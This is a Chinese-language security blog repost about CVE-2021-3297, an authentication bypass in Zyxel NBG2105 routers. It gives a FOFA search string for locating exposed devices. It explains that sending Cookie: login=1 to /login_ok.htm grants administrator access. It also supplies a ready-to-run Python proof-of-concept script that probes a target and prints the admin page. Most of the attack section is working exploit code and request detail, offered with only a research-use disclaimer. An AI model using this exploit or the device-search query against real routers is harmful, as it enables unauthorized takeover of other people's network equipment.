Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

admin 2025年4月13日23:23:46评论6 views字数 1293阅读4分18秒阅读模式

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

Zyxel NBG2105 身份验证绕过 CVE-2021-3297

漏洞描述

Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆

漏洞影响

Zyxel NBG2105

FOFA

app="ZyXEL-NBG2105"

漏洞复现

登录页面如下

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

可以看到检测到 Cookie中的 login=1 则跳转 home.html

function setCookie() //login_ok.htm use
{
    document.cookie="login=1";
    MM_goToURL('parent', 'home.htm');
}

请求如下则会以管理员身份跳转到 home.htm页面

http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;
Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

漏洞POC

# python3
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def poc(url):
    exp = url + "/login_ok.htm"

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie":"login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False,timeout=10)
        #print(response.text)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
            print("数据信息如下:")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
    except Exception as e:
        print(exp + "请求失败!!")


def main():
    url = str(input("请输入目标url:"))
    poc(url)


if __name__ == "__main__":
    main()

原文始发于微信公众号(骇客安全):Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月13日23:23:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Zyxel-NBG2105-身份验证绕过-CVE-2021-3297https://cn-sec.com/archives/3951396.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息